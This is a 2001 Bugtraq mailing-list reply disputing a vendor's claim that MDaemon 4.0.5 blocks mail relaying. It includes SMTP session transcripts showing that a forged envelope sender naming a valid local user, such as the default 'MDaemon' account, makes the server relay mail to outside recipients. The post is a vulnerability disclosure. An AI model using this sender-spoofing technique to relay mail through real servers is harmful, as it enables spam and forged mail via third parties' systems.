[22297] in bugtraq
Re: Relaying in MDaemon
daemon@ATHENA.MIT.EDU (Tabor J. Wells)
Fri Aug 17 20:00:38 2001
Date: Fri, 17 Aug 2001 18:26:40 -0400
From: "Tabor J. Wells" <twells@fsckit.net>
To: Arvel Hathcock <arvel@altn.com>
Cc: bugtraq@securityfocus.com
Message-ID: <20010817182640.E7879@fsckit.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <008d01c12734$2b716940$0100a8c0@arvel>
On Fri, Aug 17, 2001 at 10:49:04AM -0500,
Arvel Hathcock <arvel@altn.com> is thought to have said:
> > It seems like that Mdaemon SMTP server can be used for
> > unauthorized relaying. Mail can be relayed when sent
> > "FROM or TO known user", it means that mail sent "from"
> > the account of one of served domains always can be relayed.
> > There is no problem to specify any "from" user, for
> > example, system account "mdaemon".
>
> Please read the manual. There are ways of verifying addresses. Also, the
> default installation does not allow mail relaying. You have enabled it
> yourself. There is a switch setting that prevents this sort of thing and it
> is set by default.
Perhaps you should go download your product from your website and try this
yourself rather than just claiming the original poster didn't read the
documentation. I just downloaded a trial version of 4.0.5 and it relays
out of the box.
If the envelope from you provide matches a valid user (and MDaemon is the
default installed server user) at the local domain then you can relay.
And here I had been wondering why I was getting so much spam through
MDaemon servers that the various open relay blacklists were claiming were
secure. Slightly edited examples follow.
Tabor
A random invalid user fails:
220 example.com ESMTP MDaemon 4.0.5 UNREGISTERED; Fri, 17 Aug 2001 18:11:35 -0400
ehlo blah
250-example.com Hello blah, pleased to meet you
250-ETRN
250-AUTH LOGIN CRAM-MD5
250-8BITMIME
250 SIZE 0
mail from:<blah@example.com>
250 <blah@example.com>, Sender ok
rcpt to:<twells@fsckit.net>
550 <twells@fsckit.net>, Recipient unknown
quit
221 See ya in cyberspace
A known valid user succeeds:
220 example.com ESMTP MDaemon 4.0.5 UNREGISTERED; Fri, 17 Aug 2001 18:11:52 -0400
ehlo blah
250-example.com Hello blah, pleased to meet you
250-ETRN
250-AUTH LOGIN CRAM-MD5
250-8BITMIME
250 SIZE 0
mail from:<MDaemon@example.com>
250 <MDaemon@example.com>, Sender ok
rcpt to:<twells@fsckit.net>
250 <twells@fsckit.net>, Recipient ok
data
354 Enter mail, end with <CRLF>.<CRLF>
From: mdaemon@example.com
To: twells@fsckit.net
Subject: Relay Test
Blah
.
250 Ok, message saved
quit
221 See ya in cyberspace
And the relayed message it sends:
From mdaemon@example.com Fri Aug 17 18:09:32 2001
Received: from host.example.com (fsckit.net) [IP Removed]
by pulse.fsckit.net with esmtp (Exim)
for twells@fsckit.net
id 15Xro4-0002VN-00; Fri, 17 Aug 2001 18:09:32 -0400
Received: from blah [IP removed]
by example.com [223.1.1.128]
with SMTP (MDaemon.PRO.v4.0.5.T)
for <twells@fsckit.net>; Fri, 17 Aug 2001 18:08:55 -0400
From: mdaemon@example.com
To: twells@fsckit.net
Subject: Relay Test
X-MDRemoteIP: [IP removed]
X-Return-Path: mdaemon@example.com
X-MDaemon-Deliver-To: twells@fsckit.net
Message-Id: <E15Xro4-0002VN-00@pulse.fsckit.net>
Date: Fri, 17 Aug 2001 18:09:32 -0400
Status: RO
Content-Length: 6
Lines: 2
Blah
--
--------------------------------------------------------------------
Tabor J. Wells twells@fsckit.net
Fsck It! Just another victim of the ambient morality
